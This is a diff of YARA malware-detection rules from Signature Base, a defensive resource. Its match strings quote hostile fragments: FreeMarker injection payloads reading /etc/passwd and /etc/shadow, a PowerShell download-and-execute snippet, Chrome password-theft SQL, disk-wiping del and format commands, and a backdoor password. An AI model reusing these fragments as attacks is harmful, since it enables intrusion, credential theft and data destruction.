-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L499-L511"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c0be95894edc861cf322309f2c86a8ab986bb111dfdeea1990b4a074d5ab9ea3"
-		score = 50
-		quality = 85
-		tags = "FILE"
+		$x1 = "4d534854412e4558452068747470"
+		$x2 = "6d736874612e6578652068747470"
+		$x3 = "6d736874612068747470"
+		$x4 = "4d534854412068747470"
+		$s1 = "4d6963726f736f6674204571756174696f6e20332e30" ascii
+		$s2 = "4500710075006100740069006f006e0020004e00610074006900760065" ascii
+		$s3 = "2e687461000000000000000000000000000000000000000000000"
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and not uint8( 4 ) == 0x66
+		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and filesize < 300KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_ROKRAT_Malware : FILE
+rule SIGNATURE_BASE_EXP_Potential_CVE_2017_11882 : FILE
 {
 	meta:
-		description = "Detects ROKRAT Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "52e7e144-b704-5254-9a0f-928fbc96f877"
-		date = "2017-04-03"
-		modified = "2021-09-14"
-		reference = "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L8-L34"
+		description = "No description has been set in the source file - Signature Base"
+		author = "ReversingLabs"
+		id = "199710e0-5094-5940-ad29-f01383d5d8c2"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L82-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8b8fa3f97ce13e501cc25b89e2cfdaf785f1cb9f57a9dbd3461596b1bc6178c2"
+		logic_hash = "ea28010c4de86ce94537f6ab0892f6b9e28b0c775706e38bde20f48bf968d58f"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00"
-		hash2 = "cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c"
 
 	strings:
-		$x1 = "c:\\users\\appdata\\local\\svchost.exe" fullword ascii
-		$x2 = "c:\\temp\\episode3.mp4" fullword ascii
-		$x3 = "MAC-SIL-TED-FOO-YIM-LAN-WAN-SEC-BIL-TAB" ascii
-		$x4 = "c:\\temp\\%d.tmp" ascii fullword
-		$s1 = "%s%s%04d%02d%02d%02d%02d%02d.jar" fullword ascii
-		$s2 = "\\Aboard\\Acm%c%c%c.exe" ascii
-		$a1 = "ython" ascii fullword
-		$a2 = "iddler" ascii fullword
-		$a3 = "egmon" ascii fullword
-		$a6 = "iresha" ascii fullword
+		$docfilemagic = { D0 CF 11 E0 A1 B1 1A E1 }
+		$equation1 = "Equation Native" wide ascii
+		$equation2 = "Microsoft Equation 3.0" wide ascii
+		$mshta = "mshta"
+		$http = "http://"
+		$https = "https://"
+		$cmd = "cmd" fullword
+		$pwsh = "powershell"
+		$exe = ".exe"
+		$address = { 12 0C 43 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25000KB and ( 1 of ( $x* ) or ( 5 of them ) )
+		uint16( 0 ) == 0xcfd0 and $docfilemagic at 0 and any of ( $mshta , $http , $https , $cmd , $pwsh , $exe ) and any of ( $equation1 , $equation2 ) and $address
 }
-
-rule SIGNATURE_BASE_ROKRAT_Dropper_Nov17 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_1 : CVE_2022_22954
 {
 	meta:
-		description = "Detects dropper for ROKRAT malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4f3156a2-6b1b-5c65-b8fa-84c0b739d703"
-		date = "2017-11-28"
-		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L48-L61"
+		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
+		author = "Florian Roth"
+		id = "c1923d78-c339-584a-a47c-edff8f72fd0d"
+		date = "2022-04-08"
+		modified = "2025-03-29"
+		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
+		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4a444342a4fb4d10aaf8efb5c26954847ce1089c9cec37d1ab3b03e0ac566c6c"
-		score = 75
+		logic_hash = "20c1d55e29b777cca3cb8e92fbe45e23e6bbf972167dee8b0a012d9ff12f3841"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14"
-		hash2 = "a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037"
+		tags = "CVE-2022-22954"
+
+	strings:
+		$x2 = "${\"freemarker.template.utility.Execute\"?new()("
+		$x3 = "cat /etc/passwd\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
+		$x4 = "cat /etc/passwd\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
+		$x5 = "cat /etc/shadow\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
+		$x6 = "cat /etc/shadow\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
+		$fpg1 = "All Rights"
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fpg4 = "Copyright" ascii wide
+		$fpg5 = "License"
+		$fpg6 = "<?xml"
+		$fpg7 = "Help" fullword
+		$fpg8 = "COPYRIGHT" ascii wide fullword
+		$fpg9 = "Backup"
+		$fp1 = "severity: critical"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and pe.imphash ( ) == "c6187b1b5f4433318748457719dd6f39"
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17 : FILE
+rule SIGNATURE_BASE_LOG_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_ : CVE_2022_22954
 {
-	meta:
-		description = "Detects Freenki infostealer malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "01365093-e40a-524a-8a13-217742542f1e"
-		date = "2017-11-28"
-		modified = "2023-01-06"
-		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L63-L92"
+	meta:
+		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
+		author = "Florian Roth"
+		id = "c54a3a7a-aafc-52d4-863c-ed254b0da527"
+		date = "2022-04-08"
+		modified = "2025-03-29"
+		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
+		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L36-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e823ef5506b2fdf30a6ff9bdf6eee552b767b66a6c007a30618fc212d598b540"
-		score = 75
+		logic_hash = "3c383f197da1e043e632c4d4de03fa7ff42e3fb6fa7824f326874446bcd13588"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+		tags = "CVE-2022-22954"
 
 	strings:
-		$x1 = "base64Encoded=\"TVqQAAMAAAAEAAAA" ascii
-		$x2 = "command =outFile &\" sysupdate\"" fullword ascii
-		$x3 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
-		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
-		$s2 = "c:\\TEMP\\CrashReports\\" ascii
-		$s3 = "objShell.run command, 0, True" fullword ascii
-		$s4 = "sysDir = shell.ExpandEnvironmentStrings(\"%windir%\")" fullword ascii
-		$s5 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
-		$s6 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
-		$a1 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$a2 = "SELECT username_value, password_value, signon_realm FROM logins" fullword ascii
+		$x1 = "66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28" ascii
+		$fp2 = "ModSecurity"
+		$fp3 = " 302 -"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of them or all of ( $a* ) )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-
-rule SIGNATURE_BASE_Freeenki_Infostealer_Nov17_Export_Sig_Testing : FILE
+rule SIGNATURE_BASE_Invoke_Psimage : FILE
 {
 	meta:
-		description = "Detects Freenki infostealer malware"
+		description = "Detects a command to execute PowerShell from String"
 		author = "Florian Roth (Nextron Systems)"
-		id = "929f9d41-2e71-5a86-b12f-489355bdf88d"
-		date = "2017-11-28"
+		id = "6abf53cd-6465-555b-a7d4-f5a917073f01"
+		date = "2017-12-16"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L94-L106"
+		reference = "https://github.com/peewpw/Invoke-PSImage"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_psimage.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2c6d8784aa976501a77441c4e705b7fdc9654277e8cd3f6d966967fb2e1cd724"
-		score = 50
+		logic_hash = "ce4bc73fcba3b82e4d11203aa2c3f0b2f85c6eb9e1784ad76a7b20500b4053f8"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+
+	strings:
+		$ = "IEX([System.Text.Encoding]::ASCII.GetString(" ascii wide
+		$ = "System.Drawing.Bitmap((a Net.WebClient).OpenRead(" ascii wide
+		$ = { 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
+            00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9
+            E8 00 00 00 09 70 48 59 73 00 00 19 D6 00 00 19
+            D6 01 18 D1 CA ED 00 00 00 07 74 49 4D 45 07 E1
+            0C 0F 13 1E 36 89 C4 28 BF 00 00 00 07 74 45 58
+            74 41 75 74 68 6F 72 00 A9 AE CC 48 00 00 00 0C
+            74 45 58 74 44 65 73 63 72 69 70 74 69 6F 6E 00
+            13 09 21 23 00 00 00 0A 74 45 58 74 43 6F 70 79
+            72 69 67 68 74 00 AC 0F CC 3A 00 00 00 0E 74 45
+            58 74 43 72 65 61 74 69 6F 6E 20 74 69 6D 65 00
+            35 F7 0F }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and pe.exports ( "getUpdate" ) and pe.number_of_exports == 1
+		filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_ROKRAT_Nov17_1 : FILE
+rule SIGNATURE_BASE_MAL_OSX_Fancybear_Agent_Jul18_1 : FILE
 {
 	meta:
-		description = "Detects ROKRAT malware"
+		description = "Detects FancyBear Agent for OSX"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6bf3653b-1f96-5060-b6fd-82ccc83fad77"
-		date = "2017-11-28"
+		id = "ae717f70-7196-561a-916f-1598ab38c77a"
+		date = "2018-07-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rokrat.yar#L110-L127"
+		reference = "https://twitter.com/DrunkBinary/status/1018448895054098432"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_osxagent.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12641d417408ef32292204f620efa3d1347238fa1c6f63b2b6f09a6c660e9e24"
+		logic_hash = "099235424f22f3591a891726ea0c13ebf831fae0456ab1b6baba329c090a9535"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d3be93f6ce59b522ff951cef9d59ef347081ffe33d4203cd5b5df0aaa9721aa2"
 
 	strings:
-		$s1 = "\\T+M\\Result\\DocPrint.pdb" ascii
-		$s2 = "d:\\HighSchool\\version 13\\2ndBD" ascii
-		$s3 = "e:\\Happy\\Work\\Source\\version" ascii
-		$x1 = "\\appdata\\local\\svchost.exe" ascii
-		$x2 = "c:\\temp\\esoftscrap.jpg" fullword ascii
+		$x1 = "/Users/kazak/Desktop/" ascii
+		$s1 = "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist" fullword ascii
+		$s2 = "mkdir -p /Users/Shared/.local/ &> /dev/null" fullword ascii
+		$s3 = "chmod 755 /Users/Shared/start.sh" fullword ascii
+		$s4 = "chmod 755 %s/%s &> /dev/null" fullword ascii
+		$s6 = "chmod 755 /Users/Shared/.local/kextd" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of them )
+		uint16( 0 ) == 0xfacf and filesize < 3000KB and ( 1 of ( $x* ) and 4 of them )
 }
-rule SIGNATURE_BASE_APT_APT28_Cannon_Trojan_Nov18_1 : FILE
+rule SIGNATURE_BASE_Blackenergy_BE_2 : FILE
 {
 	meta:
-		description = "Detects Cannon Trojan used by Sofacy"
+		description = "Detects BlackEnergy 2 Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a60f3e75-8bfe-592e-90d1-321bd86173ac"
-		date = "2018-11-20"
+		id = "c93991b9-77e8-5a73-80ef-e21df770c3a5"
+		date = "2015-02-19"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_cannon.yar#L2-L32"
+		reference = "http://goo.gl/DThzLz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L8-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "de8c7bf80fe6209d00955c375b769a3aca138759335abb11f5086f85a4a9c367"
+		hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
+		logic_hash = "77ecab353063bf8be5ec70294f8497234af8ddd944e0b207d8d633f59f76dbb6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 46 6F 72 6D 31 00 63 61 6E 6E 6F 6E 00 4D 44 61
-               74 00 41 55 54 48 }
-		$xc2 = { 13 4F 00 53 00 3A 00 20 00 20 00 7B 00 30 00 7D
-               00 0A 00 00 17 53 00 44 00 69 00 72 00 3A 00 20
-               00 20 00 7B 00 30 00 7D 00 0A 00 00 1B 44 00 6F
-               00 6D 00 61 00 69 00 6E 00 3A 00 20 00 20 00 7B
-               00 30 00 7D 00 0A 00 00 15 48 00 6F 00 73 00 74
-               00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00 21 43
-               00 75 00 72 00 72 00 65 00 6E 00 74 00 55 00 73
-               00 72 00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00
-               17 54 00 69 00 6D 00 65 00 5A 00 3A 00 20 00 7B
-               00 30 00 7D }
-		$x2 = "\\Desktop\\cannon\\obj\\" ascii
-		$x3 = "C:\\Users\\Public\\Music\\s.txt" fullword wide
-		$s1 = "C:\\Documents and Settings\\All Users\\Documents" fullword wide
-		$s2 = "notEncoded - Value here is never used" fullword wide
-		$s3 = "Windows NT\\CurrentVersion\\Winlogon\"" fullword wide
-		$s4 = "AnswerMessageTraverser`1" fullword ascii
+		$s0 = "<description> Windows system utility service  </description>" fullword ascii
+		$s1 = "WindowsSysUtility - Unicode" fullword wide
+		$s2 = "msiexec.exe" fullword wide
+		$s3 = "WinHelpW" fullword ascii
+		$s4 = "ReadProcessMemory" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) or 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_1 : FILE
+rule SIGNATURE_BASE_Blackenergy_VBS_Agent : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF"
-		author = "Fidelis Cybersecurity"
-		id = "c825c5d6-1c2f-5ee7-871e-4be3f41d73f7"
-		date = "2016-02-29"
-		modified = "2023-05-04"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L1-L49"
+		description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0876f752-d476-5706-918e-edfda9bd7928"
+		date = "2016-01-03"
+		modified = "2023-12-05"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L34-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "61ef65a1500d3def3376a82bc376db451d202d18b03855ee279b6c01757deb2a"
+		hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
+		logic_hash = "2a0037a76f1031117fe41b2e41691511eb626ffc0c738547eda24f771505bc67"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LxMain"
-		$s2 = "execve"
-		$s3 = "kill"
-		$s4 = "cp -a %s %s"
-		$s5 = "%s &"
-		$s6 = "dbus-daemon"
-		$s7 = "--noprofile"
-		$s8 = "--norc"
-		$s9 = "TERM=vt100"
-		$s10 = "/proc/%u/cmdline"
-		$s11 = "loadso"
-		$s12 = "/proc/self/exe"
-		$s13 = "Proxy-Connection: Keep-Alive"
-		$s14 = "Connection: Keep-Alive"
-		$s15 = "CONNECT %s"
-		$s16 = "HOST: %s:%d"
-		$s17 = "User-Agent: Mozilla/4.0"
-		$s18 = "Proxy-Authorization: Basic %s"
-		$s19 = "Server: Apache"
-		$s20 = "Proxy-Authenticate"
-		$s21 = "gettimeofday"
-		$s22 = "pthread_create"
-		$s23 = "pthread_join"
-		$s24 = "pthread_mutex_init"
-		$s25 = "pthread_mutex_destroy"
-		$s26 = "pthread_mutex_lock"
-		$s27 = "getsockopt"
-		$s28 = "socket"
-		$s29 = "setsockopt"
-		$s30 = "select"
-		$s31 = "bind"
-		$s32 = "shutdown"
-		$s33 = "listen"
-		$s34 = "opendir"
-		$s35 = "readdir"
-		$s36 = "closedir"
-		$s37 = "rename"
+		$s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
+		$s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
+		$s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Kernelmodule_1 : FILE
+rule SIGNATURE_BASE_Dropbear_SSH_Server : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF Kernel Module"
-		author = "Fidelis Cybersecurity"
-		id = "98196ffc-8a6f-5edc-a688-eeb449410b72"
-		date = "2016-02-29"
-		modified = "2023-05-04"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L51-L83"
+		description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "22595d8b-b7ea-570e-ad17-d5bcec613abf"
+		date = "2016-01-03"
+		modified = "2023-12-05"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L51-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fab37e2dbe05c694da6e428aa922747b276c2827cbbd2b6c8002f0cc30c2870c"
-		score = 75
+		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
+		logic_hash = "6b8acaaa64329d09d3d22d74f4f40288fba3f5faaff63e1ee6b2e6153f14d730"
+		score = 50
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "__this_module"
-		$s2 = "init_module"
-		$s3 = "unhide_pid"
-		$s4 = "is_hidden_pid"
-		$s5 = "clear_hidden_pid"
-		$s6 = "hide_pid"
-		$s7 = "license"
-		$s8 = "description"
-		$s9 = "srcversion="
-		$s10 = "depends="
-		$s12 = "vermagic="
-		$s13 = "current_task"
-		$s14 = "sock_release"
-		$s15 = "module_layout"
-		$s16 = "init_uts_ns"
-		$s17 = "init_net"
-		$s18 = "init_task"
-		$s19 = "filp_open"
-		$s20 = "__netlink_kernel_create"
-		$s21 = "kfree_skb"
+		$s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
+		$s2 = "Badly formatted command= authorized_keys option" fullword ascii
+		$s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
+		$s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
+		$s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation_1 : FILE
+rule SIGNATURE_BASE_Blackenergy_Backdoorpass_Dropbear_SSH : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF Shared Memory Creation"
-		author = "Fidelis Cybersecurity"
-		id = "068b7bea-853d-57e8-a9fe-8b451dbc7582"
-		date = "2016-02-29"
+		description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
+		author = "Florian Roth (Nextron Systems)"
+		id = "60db00dd-72b3-5a28-90de-2a397b1e007b"
+		date = "2016-01-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L85-L96"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L71-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "adbdccea9ea7aefcca18d659c027a49e7e2e053873b77ddaf369203b3e301033"
+		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
+		logic_hash = "3af58d155691d9323458280ad1b933e8e784acafb0974f5f267b93d9b02e825e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
+		$s1 = "passDs5Bu9Te7" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464C457F and any of them
+		uint16( 0 ) == 0x5a4d and $s1
 }
-rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Strings_1 : FILE
+rule SIGNATURE_BASE_Blackenergy_Killdisk_1 : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor ELF Strings"
-		author = "Fidelis Cybersecurity"
-		id = "06717cc9-678d-5912-a671-65605b9c9968"
-		date = "2016-02-29"
+		description = "Detects KillDisk malware from BlackEnergy"
+		author = "Florian Roth (Nextron Systems)"
+		id = "304e7aa3-48d3-5015-aaf1-6b1df2441b75"
+		date = "2016-01-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L98-L128"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L88-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b54b406a562247d4c3d4a9c4d1b7584bdcecfe5b6c76867c04770e016eeb8c9a"
-		score = 75
-		quality = 83
+		logic_hash = "fa64434422a16166938b9eede9c50b79bae90632f1500e6529dcf26dbebe50f1"
+		score = 80
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+		hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
+		hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
 
 	strings:
-		$a1 = "loadso" wide ascii fullword
-		$a2 = "\nuname -a\n\n" wide ascii
-		$a3 = "/dev/shm/.x11.id" wide ascii
-		$a4 = "LxMain64" wide ascii nocase
-		$a5 = "# \\u@\\h:\\w \\$ " wide ascii
-		$b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
-		$b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
-		$b3 = "ret %d" wide fullword
-		$b4 = "uname -a\n\n" wide ascii
-		$b5 = "/proc/%u/cmdline" wide ascii
-		$b6 = "/proc/self/exe" wide ascii
-		$b7 = "cp -a %s %s" wide ascii
-		$c1 = "/dev/pts/4" wide ascii fullword
-		$c2 = "/tmp/1408.log" wide ascii fullword
+		$s0 = "system32\\cmd.exe" fullword ascii
+		$s1 = "system32\\icacls.exe" fullword wide
+		$s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
+		$s3 = "shutdown /r /t %d" fullword ascii
+		$s4 = "/C /Q /grant " fullword wide
+		$s5 = "%08X.tmp" fullword ascii
+		$s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
+		$s7 = "/c format %c: /Y /Q" fullword ascii
+		$s8 = "taskhost.exe" fullword wide
+		$s9 = "shutdown.exe" fullword wide
 
 	condition:
